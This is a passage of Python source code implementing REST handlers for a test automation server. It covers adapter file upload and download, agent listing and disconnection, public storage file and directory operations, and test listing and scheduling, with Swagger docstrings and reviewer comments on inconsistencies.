                raise EmptyValue("Please specify a source folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        folder_path = os.path.normpath("/" + folder_path)

        rc = RepoAdapters.instance().addDir(
            pathFolder=folder_path, folderName=folder_name)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to add directory")
        if rc == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")

        return {"cmd": self.request.path,
                "message": "directory successfully added"}
class AdaptersFileUpload(HandlerCORS):
    """
    /rest/adapters/file/upload
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: Upload file the test storage
        description: ''
        operationId: adaptersFileUpload
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path, file-name, file-extension, file-content ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
                file-name:
                  type: string
                file-extension:
                  type: string
                file-content:
                  type: string
                overwrite:
                  type: boolean
                close-after:
                  type: boolean
                add-folders:
                  type: boolean
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                code:
                  type: integer
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/upload",
                  "code": 200
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # monitor accounts are read-only: refuse uploads
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # validate the json payload; the file coordinates and its content
        # are mandatory, the three flags default to False
        # NOTE(review): the swagger doc above declares project-id as required,
        # but this handler never reads it (project='' is passed below) — confirm
        try:
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a file path")
            fileName = self.request.data.get("file-name")
            if fileName is None:
                raise EmptyValue("Please specify a file name")
            fileExt = self.request.data.get("file-extension")
            if fileExt is None:
                raise EmptyValue("Please specify a file extension")
            fileContent = self.request.data.get("file-content")
            if fileContent is None:
                raise EmptyValue("Please specify a file content")
            _overwrite = self.request.data.get("overwrite", False)
            _closeafter = self.request.data.get("close-after", False)
            _addfolders = self.request.data.get("add-folders", False)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # write the (base64/binary) content into the adapters repository,
        # taking a lock on the file (lockMode=True)
        putFileReturn = RepoAdapters.instance().uploadFile(pathFile=filePath,
                                                           nameFile=fileName,
                                                           extFile=fileExt,
                                                           contentFile=fileContent,
                                                           login=user_profile['login'],
                                                           project='',
                                                           overwriteFile=_overwrite,
                                                           createFolders=_addfolders,
                                                           lockMode=True,
                                                           binaryMode=True,
                                                           closeAfter=_closeafter)
        # unpack the 9-tuple returned by uploadFile; the 5th element is unused here
        success, pathFile, nameFile, extFile, _, overwriteFile, closeAfter, isLocked, lockedBy = putFileReturn
        # echo the effective parameters back to the client; "code" carries the
        # repository return code rather than raising on failure
        return {"cmd": self.request.path,
                "code": success,
                "file-path": pathFile,
                "file-name": nameFile,
                "file-extension": extFile,
                "overwrite": overwriteFile,
                "close-after": closeAfter,
                "locked": isLocked,
                "locked-by": lockedBy}
class AdaptersFileDownload(HandlerCORS):
    """
    /rest/adapters/file/download
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: download file from the test storage
        description: ''
        operationId: adaptersFileDownload
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                file-content:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/download",
                  "file-content": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)
        # validate the json payload: project id and file path are mandatory
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # the caller must be authorized on the target project
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)
        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        # NOTE(review): although this is an /adapters endpoint, the read goes
        # through RepoTests (the tests repository), not RepoAdapters — the
        # sibling /adapters/file/open handler uses RepoAdapters; confirm this
        # is intentional
        success, _, _, _, content, _, _ = RepoTests.instance().getFile(pathFile=filePath,
                                                                       binaryMode=True,
                                                                       project=projectId,
                                                                       addLock=False)
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500("Unable to download file")
        # content is the raw (binary-mode) file payload returned by getFile
        return {"cmd": self.request.path, "file-content": content}
class AdaptersFileOpen(HandlerCORS):
    """
    /rest/adapters/file/open
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - adapters
        summary: open and lock file from the test storage
        description: ''
        operationId: adaptersFileOpen
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                file-content:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/adapters/file/open",
                  "file-content": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # validate the json payload; the two flags are optional and default
        # to False
        try:
            file_path = self.request.data.get("file-path")
            if file_path is None:
                raise EmptyValue("Please specify a file path")
            ignore_lock = self.request.data.get("ignore-lock", False)
            read_only = self.request.data.get("read-only", False)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        file_path = os.path.normpath("/" + file_path)

        # open the adapter file, taking a lock for this user unless
        # read-only/force-open was requested
        (rc, path_file, name_file, ext_file,
         project, data_base64, locked, locked_by) = RepoAdapters.instance().getFile(
            pathFile=file_path,
            login=user_profile['login'],
            forceOpen=ignore_lock,
            readOnly=read_only)
        if rc != Context.instance().CODE_OK:
            raise HTTP_500("Unable to open adapter file")

        return {"cmd": self.request.path,
                "file-content": data_base64,
                "file-path": path_file,
                "file-name": name_file,
                "file-extension": ext_file,
                "locked": locked,
                "locked-by": locked_by,
                "project-id": project}
"""
Agents handlers
"""
class AgentsRunning(HandlerCORS):
    """
    /rest/agents/running
    """
    @_to_yaml
    def get(self):
        """
        tags:
          - agents
        summary: Get all running agents
        description: ''
        operationId: agentsRunning
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
        responses:
          '200':
            description: running agents
            schema :
              properties:
                cmd:
                  type: string
                agents-running:
                  type: array
                  items:
                    type: string
            examples:
              application/json: |
                {
                  "cmd": "/agents/running",
                  "agents-running": ...
                }
        """
        # user_profile = _get_user(request=self.request)
        # ask the agents manager for the list of currently connected agents
        running = AgentsManager.instance().getRunning()
        # NOTE(review): the swagger example above documents the key as
        # "agents-running" but the actual response uses "agents"; existing
        # clients may depend on "agents" — confirm before aligning either side
        return {"cmd": self.request.path, "agents": running}
class AgentsDisconnect(HandlerCORS):
    """
    /rest/agents/disconnect
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - agents
        summary: Disconnect a agent by the name
        description: ''
        operationId: agentsDisconnect
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ agent-name ]
              properties:
                agent-name:
                  type: string
        responses:
          '200':
            description:
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/agents/disconnect",
                  "message: "agent successfully disconnected"
                }
          '400':
            description: Bad request provided
          '404':
            description: Agent not found
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload: the agent name is mandatory
        try:
            agentName = self.request.data.get("agent-name")
            if agentName is None:
                # raise EmptyValue (not HTTP_400) so the specific message is
                # surfaced by the EmptyValue handler below instead of being
                # re-wrapped by the generic "Bad request provided" catch-all,
                # consistent with every sibling handler in this file
                raise EmptyValue("Please specify a agent name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # ask the agents manager to drop the connection
        disconnected = AgentsManager.instance().disconnectAgent(name=agentName)
        if disconnected == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("agent not found")

        return {"cmd": self.request.path,
                "message": "agent successfully disconnected"}
"""
Public storage handlers
"""
class PublicListing(HandlerCORS):
    """
    /rest/public/listing/basic
    """
    def get(self):
        """
        tags:
          - public
        summary: Get the listing of all files and folders in the public area
        description: ''
        operationId: publicListing
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
        responses:
          '200':
            description: Listing file in public area
            schema :
              properties:
                cmd:
                  type: string
                public-listing:
                  type: array
                  items:
                    type: string
            examples:
              application/json: |
                {
                  "public-listing": [],
                  "cmd": "/public/listing/basic"
                }
          '401':
            description: Access denied
        """
        # user_profile = _get_user(request=self.request)
        # flat listing of the public repository, no filtering applied
        files_and_folders = RepoPublic.instance().getBasicListing()
        return {"cmd": self.request.path, "public-listing": files_and_folders}
class PublicDirectoryAdd(HandlerCORS):
    """
    /rest/public/directory/add
    """
    def post(self):
        """
        tags:
          - public
        summary: Add directory in the public storage
        description: ''
        operationId: publicDirectoryAdd
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ directory-path, directory-name ]
              properties:
                directory-path:
                  type: string
                directory-name:
                  type: string
        responses:
          '200':
            description: Directory successfully added
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "directory successfully added",
                  "cmd": "/public/directory/add"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: Directory already exists
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload: both the name and the parent path
        # of the new directory are mandatory
        payload = self.request.data
        try:
            folder_name = payload.get("directory-name")
            if folder_name is None:
                raise EmptyValue("Please specify a source folder name")
            folder_path = payload.get("directory-path")
            if folder_path is None:
                raise EmptyValue("Please specify a source folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        folder_path = os.path.normpath("/" + folder_path)

        rc = RepoPublic.instance().addDir(
            pathFolder=folder_path, folderName=folder_name)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to add directory")
        if rc == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")

        return {"cmd": self.request.path,
                "message": "directory successfully added"}
class PublicDirectoryRename(HandlerCORS):
    """
    /rest/public/directory/rename
    """
    def post(self):
        """
        tags:
          - public
        summary: Rename directory name in the public storage
        description: ''
        operationId: publicDirectoryRename
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ directory-path, directory-name  ]
                  properties:
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ directory-name ]
                  properties:
                    directory-name:
                      type: string
        responses:
          '200':
            description: Directory successfully renamed
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "directory successfully renamed",
                  "cmd": "/public/directory/rename"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: Directory already exists
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload: a missing "source"/"destination" object
        # raises KeyError/TypeError which the generic handler maps to HTTP 400
        try:
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            newFolderName = self.request.data.get(
                "destination")["directory-name"]
            if newFolderName is None:
                raise EmptyValue("Please specify a destination folder name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        # NOTE(review): this /public endpoint delegates to RepoTests (the tests
        # repository) while the add/listing handlers above use RepoPublic —
        # confirm this is intentional and not a copy-paste of a tests handler
        success = RepoTests.instance().renameDir(mainPath=folderPath, oldPath=folderName,
                                                 newPath=newFolderName)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to rename directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to rename directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")
        return {"cmd": self.request.path,
                "message": "directory successfully renamed"}
class PublicDirectoryRemove(HandlerCORS):
    """
    /rest/public/directory/remove
    """
    def post(self):
        """
        tags:
          - public
        summary: Remove directory in the public storage and their contents recursively
        description: ''
        operationId: publicDirectoryRemove
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source ]
              properties:
                source:
                  type: object
                  required: [ directory-path ]
                  properties:
                    directory-path:
                      type: string
                recursive:
                  type: boolean
        responses:
          '200':
            description: Directory successfully removed
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "directory successfully removed",
                  "cmd": "/public/directory/remove"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: Cannot remove directory | Removing directory denied
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload; "recursive" is read from the top level
        # of the body (the swagger above nests it under "source") and
        # defaults to False
        try:
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            _recursive = self.request.data.get("recursive", False)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        # NOTE(review): this /public endpoint delegates to RepoTests rather
        # than RepoPublic — confirm intended
        if _recursive:
            # remove the directory together with everything below it
            success = RepoTests.instance().delDirAll(folderPath)
            if success == Context.instance().CODE_ERROR:
                raise HTTP_500("Unable to remove directory")
            if success == Context.instance().CODE_NOT_FOUND:
                raise HTTP_500("Unable to remove directory (missing)")
            if success == Context.instance().CODE_FORBIDDEN:
                raise HTTP_403("Removing directory denied")
        else:
            # non-recursive remove: fails if the directory is not empty
            success = RepoTests.instance().delDir(folderPath)
            if success == Context.instance().CODE_ERROR:
                raise HTTP_500("Unable to remove directory")
            if success == Context.instance().CODE_NOT_FOUND:
                raise HTTP_500("Unable to remove directory (missing)")
            if success == Context.instance().CODE_FORBIDDEN:
                raise HTTP_403("Cannot remove directory")
        return {"cmd": self.request.path,
                "message": "directory successfully removed"}
class PublicImport(HandlerCORS):
    """
    /rest/public/file/import
    """
    def post(self):
        """
        tags:
          - public
        summary: Import file to the public storage. Provide the file in base64 format
        description: ''
        operationId: publicFileImport
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-path, file-content ]
              properties:
                file-path:
                  type: string
                file-content:
                  type: string
                  string: in base64 format
        responses:
          '200':
            description: File sucessfully imported
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "file sucessfully imported",
                  "cmd": "/public/file/import"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: File already exists
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload: BOTH the path and the content are
        # mandatory (the previous "and" only rejected the request when both
        # were missing, letting a half-formed request through)
        try:
            filePath = self.request.data.get("file-path")
            fileContent = self.request.data.get("file-content")
            if not filePath or not fileContent:
                raise EmptyValue(
                    "Please specify a project name, file content and path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        # split "<dir>/<name>.<ext>" into its components; a path without an
        # extension is a client error, not an unhandled ValueError (HTTP 500)
        try:
            _filePath, fileExtension = filePath.rsplit(".", 1)
        except ValueError:
            raise HTTP_400("Please specify a file extension in the file path")
        _filePath = _filePath.rsplit("/", 1)
        if len(_filePath) == 2:
            filePath = _filePath[0]
            fileName = _filePath[1]
        else:
            filePath = "/"
            fileName = _filePath[0]
        # NOTE(review): this /public endpoint writes through RepoTests rather
        # than RepoPublic — confirm intended
        success, _, _, _, _ = RepoTests.instance().importFile(pathFile=filePath, nameFile=fileName, extFile=fileExtension,
                                                              contentFile=fileContent, binaryMode=True)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to add file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("File already exists")
        return {"cmd": self.request.path,
                "message": "file sucessfully imported"}
class PublicRemove(HandlerCORS):
    """
    /rest/public/file/remove
    """
    def post(self):
        """
        tags:
          - public
        summary: Import file to the public storage. Provide the file in base64 format
        description: ''
        operationId: publicFileRemove
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-path, file-content ]
              properties:
                file-path:
                  type: string
                file-content:
                  type: string
                  string: in base64 format
        responses:
          '200':
            description: File sucessfully imported
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "file sucessfully imported",
                  "cmd": "/public/file/import"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: File already exists
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload
        try:
            file_path = self.request.data.get("file-path")
            if file_path is None:
                raise EmptyValue("Please specify a project name and file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        file_path = os.path.normpath("/" + file_path)

        # remove the file without keeping a snapshot copy
        rc = RepoTests.instance().delFile(
            pathFile=file_path, supportSnapshot=False)

        ctx = Context.instance()
        if rc == ctx.CODE_ERROR:
            raise HTTP_500("Unable to remove file")
        elif rc == ctx.CODE_FAILED:
            raise HTTP_403("Remove file denied")
        elif rc == ctx.CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")

        return {"cmd": self.request.path,
                "message": "file sucessfully removed"}
class PublicRename(HandlerCORS):
    """
    /rest/public/file/rename
    """
    def post(self):
        """
        tags:
          - public
        summary: Import file to the public storage. Provide the file in base64 format
        description: ''
        operationId: publicFileRename
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-path, file-content ]
              properties:
                file-path:
                  type: string
                file-content:
                  type: string
                  string: in base64 format
        responses:
          '200':
            description: File sucessfully imported
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "file sucessfully imported",
                  "cmd": "/public/file/import"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: File already exists
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload; the original code read fileName from
        # "file-path" and filePath from "file-name" (keys swapped), so the
        # rename was applied with path and name transposed — fixed here
        try:
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                raise EmptyValue("Please specify a source filename")
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                raise EmptyValue("Please specify a source file path")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")
            newFileName = self.request.data.get("destination")["file-name"]
            if newFileName is None:
                raise EmptyValue("Please specify a destination file name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        # rename <filePath>/<fileName>.<fileExt> to <newFileName>.<fileExt>
        success = RepoTests.instance().renameFile(
            mainPath=filePath,
            oldFilename=fileName,
            newFilename=newFileName,
            extFilename=fileExt,
            supportSnapshot=False
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to rename file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Rename file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")
        return {"cmd": self.request.path,
                "message": "file sucessfully renamed"}
class PublicDownload(HandlerCORS):
    """
    /rest/public/file/download
    """
    def post(self):
        """
        tags:
          - public
        summary: Import file to the public storage. Provide the file in base64 format
        description: ''
        operationId: publicFileDownload
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ file-path, file-content ]
              properties:
                file-path:
                  type: string
                file-content:
                  type: string
                  string: in base64 format
        responses:
          '200':
            description: File sucessfully imported
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "file sucessfully imported",
                  "cmd": "/public/file/import"
                }
          '401':
            description: Access denied
          '400':
            description: Bad request
          '403':
            description: File already exists
          '500':
            description: Server error
        """
        # user_profile = _get_user(request=self.request)
        # validate the json payload
        try:
            file_path = self.request.data.get("file-path")
            if file_path is None:
                raise EmptyValue("Please specify a project name and file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # re-anchor the path on the repository root to block directory traversal
        file_path = os.path.normpath("/" + file_path)

        # read the raw file content without taking any lock
        rc, _, _, _, content, _, _ = RepoTests.instance().getFile(
            pathFile=file_path, binaryMode=True, addLock=False)
        if rc == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500("Unable to download file")

        return {"cmd": self.request.path, "file-content": content}
"""
Tests handlers
"""
class TestsDictListing(HandlerCORS):
    """
    /rest/tests/listing/dict
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Get the listing of all tests in dict mode.
        description: ''
        operationId: testsDictListing
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id ]
              properties:
                project-id:
                  type: integer
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                listing:
                  type: array
                  items:
                    type: string
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/listing/dict",
                  "listing": {},
                  "project-id": 1
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json payload: a project id is mandatory
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # the caller must be authorized on the target project
        _check_project_permissions(
            user_login=profile['login'],
            project_id=project_id)

        # nested-dict view of the project's test tree
        listing = RepoTests.instance().getDictListing(projectId=project_id)
        return {"cmd": self.request.path,
                "listing": listing, "project-id": project_id}
class TestsBasicListing(HandlerCORS):
    """
    /rest/tests/listing/basic
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Get the listing of all tests in basic mode.
        description: ''
        operationId: testsBasicListing
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id ]
              properties:
                project-id:
                  type: integer
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                listing:
                  type: array
                  items:
                    type: string
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/listing/basic",
                  "listing": ["/Snippets/UI/03_OpenBrowser.tux", "/Snippets/UI/05_MaximizeBrowser.tux"],
                  "project-id": 1
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json payload: a project id is mandatory
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # the caller must be authorized on the target project
        _check_project_permissions(
            user_login=profile['login'],
            project_id=project_id)

        # flat list of the project's test files
        listing = RepoTests.instance().getBasicListing(projectId=project_id)
        return {"cmd": self.request.path,
                "listing": listing, "project-id": project_id}
class TestsScheduleGroup(HandlerCORS):
    """
    /rest/tests/schedule/group
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Schedule a group of tests
        description: ''
        operationId: testsScheduleGroup
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ tests, postpone-at, parallel-mode, postpone-mode]
              properties:
                tests:
                  type: array
                  items:
                    type: string
                postpone-at:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                parallel-mode:
                  type: boolean
                postpone-mode:
                  type: boolean
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/schedule/group",
                  "message": "success"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # extract and validate the mandatory fields of the payload
        try:
            postponeAt = self.request.data.get("postpone-at")
            if postponeAt is None:
                raise EmptyValue("Please specify a postpone at")
            postponeMode = self.request.data.get("postpone-mode")
            if postponeMode is None:
                raise EmptyValue("Please specify a postpone mode")
            tests = self.request.data.get("tests")
            if tests is None:
                raise EmptyValue("Please specify tests")
            parallel = self.request.data.get("parallel-mode")
            if parallel is None:
                raise EmptyValue("Please specify parallel-mode")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # the postpone date must be a [ Y, M, D, H, M, S ] array
        if len(postponeAt) != 6:
            raise HTTP_400(
                "Bad schedule-at provided in request, array of size 6 expected")

        testsRun = []
        for t in tests:
            # each entry is formatted as "<project-name>:<path>/<name>.<ext>"
            try:
                prjName, absPath = t.split(':', 1)
            except Exception as e:
                raise HTTP_500("Unable to extract project name: %s" % str(e))
            prjID = ProjectsManager.instance().getProjectID(name=prjName)
            testPath, testExtension = absPath.rsplit('.', 1)
            if len(testPath.rsplit('/', 1)) > 1:
                testName = testPath.rsplit('/', 1)[1]
            else:
                testName = testPath.rsplit('/', 1)[0]

            # load the test content from the repository according to its type
            if testExtension == 'tsx':
                doc = TestSuite.DataModel()
                res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath, prjID,
                                                        testPath, testExtension))
                if not res:
                    raise HTTP_500('Unable to read test suite: %s' % testPath)

                testData = {'test-definition': doc.testdef,
                            'test-execution': doc.testexec,
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}
                testsRun.append({'prj-id': prjID,
                                 'test-extension': testExtension,
                                 'test-name': testName,
                                 'test-path': testPath, 'test-data': testData})

